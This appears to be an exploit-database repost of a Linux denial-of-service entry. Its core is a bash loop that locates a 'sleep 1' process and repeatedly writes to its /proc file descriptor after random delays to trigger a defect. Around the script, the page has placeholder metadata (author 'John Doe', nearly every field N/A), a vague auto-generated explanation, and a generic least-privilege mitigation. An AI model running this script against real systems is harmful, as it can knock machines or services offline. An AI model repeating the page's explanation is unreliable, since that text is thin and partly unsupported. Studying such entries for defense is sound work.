header-logo
Suggest Exploit
vendor:
Linux
by:
John Doe
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Linux
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

Denial of Service Vulnerability in Linux

This exploit is a denial of service vulnerability in Linux. It is triggered by writing 'n' to the file descriptor of a process that is running 'sleep 1'. This causes the process to terminate, resulting in a denial of service.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all processes are running with the least privileges necessary.
Source

Exploit-DB raw data:

while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done